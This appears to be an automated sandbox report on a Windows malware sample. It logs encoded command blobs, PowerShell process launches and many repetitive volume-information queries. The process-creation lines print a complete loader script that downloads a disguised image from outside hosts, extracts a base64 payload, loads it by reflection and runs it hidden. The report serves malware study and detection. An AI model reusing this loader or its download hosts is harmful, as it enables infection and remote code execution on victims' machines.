@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.drbfojs/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@cJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.drbfojs/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D812EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6A1D812EC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
